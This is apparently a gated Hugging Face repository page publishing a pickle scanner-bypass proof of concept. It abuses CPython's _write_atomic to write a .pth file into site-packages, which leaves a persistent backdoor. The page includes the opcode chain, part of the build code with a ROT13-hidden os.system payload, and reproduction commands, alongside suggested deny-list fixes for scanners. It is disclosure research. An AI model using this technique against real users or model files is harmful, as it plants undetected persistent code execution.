You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.

CPython _write_atomic + .pth — Persistent Backdoor

Security Research — Responsible Disclosure This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request — see gate above.

Summary

Scanner scores for malicious_model.pkl:

Scanner	WARNING	Bypassed?
modelaudit 0.2.37	3	Yes — 0 CRITICAL
picklescan 1.0.4	0	Yes
modelscan	0	Yes

Vulnerability

_frozen_importlib_external._write_atomic(path, data, mode) writes raw bytes to any writable path. It is a CPython internal function used for writing .pyc cache files.

Why it's not caught: modelaudit bans importlib as a module prefix. But _frozen_importlib_external does not match that prefix — Python treats the underscore-prefixed CPython internals as separate modules despite their related functionality. This is a systematic gap: underscore-prefixed internal modules implement the same dangerous capabilities as their public counterparts but escape the deny list.

The .pth mechanism: Python's site module reads every .pth file in site-packages on startup. Any line starting with import is exec()'d. Writing one .pth creates a backdoor that:

Executes on every python invocation, not just once
Survives reboots
Persists until manually discovered and removed

Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

def build(canary_path: str, pth_name: str) -> bytes:
    payload_source = f"import os; os.system('echo pth_pwned > {canary_path}')"
    rot13_payload  = codecs.encode(payload_source, "rot_13")

    ops = bytearray(b"\x80\x04")

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib) — any file deserialized via pickle.loads(), torch.load(), joblib.load(), or equivalent.

Conditions required to trigger

Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
The scanner performs static analysis only (no sandboxed execution)
Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-cpython-pth-persistence
cd pickle-bypass-cpython-pth-persistence

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan — observe scanner scores match table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

Add _frozen_importlib, _frozen_importlib_external to ALWAYS_DANGEROUS_MODULES
Or add _frozen_importlib_external._write_atomic to ALWAYS_DANGEROUS_FUNCTIONS
Flag any pickle that writes files during deserialization as CRITICAL

Bypass mechanism: The payload evades static analysis while achieving its effect (code execution, file write, or network connection) when pickle.loads() is called.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently — the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.

Full Technical Writeup

CPython _write_atomic + .pth — Persistent Backdoor

Score: 0 CRITICAL, 3 WARNING
Effect: Permanent backdoor — executes on every future Python startup
Scanner version: modelaudit 0.2.37

Mechanism

_frozen_importlib_external._write_atomic(path, data, mode) writes raw bytes to any writable path. It is a CPython internal function used for writing .pyc cache files.

The .pth mechanism: Python's site module reads every .pth file in site-packages on startup. Any line starting with import is exec()'d. Writing one .pth creates a backdoor that:

Executes on every python invocation, not just once
Survives reboots
Persists until manually discovered and removed

Pickle Structure

sysconfig.get_path('purelib')                 → site-packages dir  [WARNING 1]
operator.add(dir, '/backdoor.pth')            → full path          [WARNING 2]
_codecs.encode(rot13_payload, 'rot_13')       → source string      [0 findings]
_codecs.encode(source, 'utf-8')               → payload bytes      [0 findings]
_write_atomic(full_path, payload_bytes, 0o666) → writes .pth       [WARNING 3]

Attack Flow

Victim downloads malicious model from HuggingFace
Victim calls joblib.load("model.pkl") or pickle.loads(...)
Pickle silently writes _evil.pth to site-packages
Load returns normally (victim sees a model or None)
Every future python invocation on that machine executes the .pth code
Backdoor persists until someone manually discovers and deletes the .pth file

Recommended Fixes

Add _frozen_importlib, _frozen_importlib_external to ALWAYS_DANGEROUS_MODULES
Or add _frozen_importlib_external._write_atomic to ALWAYS_DANGEROUS_FUNCTIONS
Flag any pickle that writes files during deserialization as CRITICAL

General Analysis — Security Research

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support